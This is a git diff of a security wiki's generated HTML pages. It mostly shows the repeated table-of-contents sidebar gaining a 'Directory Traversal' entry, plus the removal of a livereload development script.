      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -175,22 +175,6 @@

SQL Injection - - diff --git a/docs/Exploitation/Web/Template Injection.html b/docs/Exploitation/Web/Template Injection.html index 39843152..ef2d51c8 100644 --- a/docs/Exploitation/Web/Template Injection.html +++ b/docs/Exploitation/Web/Template Injection.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -185,22 +185,6 @@

- const wsProtocol = location.protocol === 'https:' ? 'wss:' : 'ws:'; - const wsAddress = wsProtocol + "//" + location.host + "/" + "__livereload"; - const socket = new WebSocket(wsAddress); - socket.onmessage = function (event) { - if (event.data === "reload") { - socket.close(); - location.reload(); - } - }; - - window.onbeforeunload = function() { - socket.close(); - } - diff --git a/docs/Exploitation/Web/WebSockets.html b/docs/Exploitation/Web/WebSockets.html index 5e8c2470..033264a9 100644 --- a/docs/Exploitation/Web/WebSockets.html +++ b/docs/Exploitation/Web/WebSockets.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
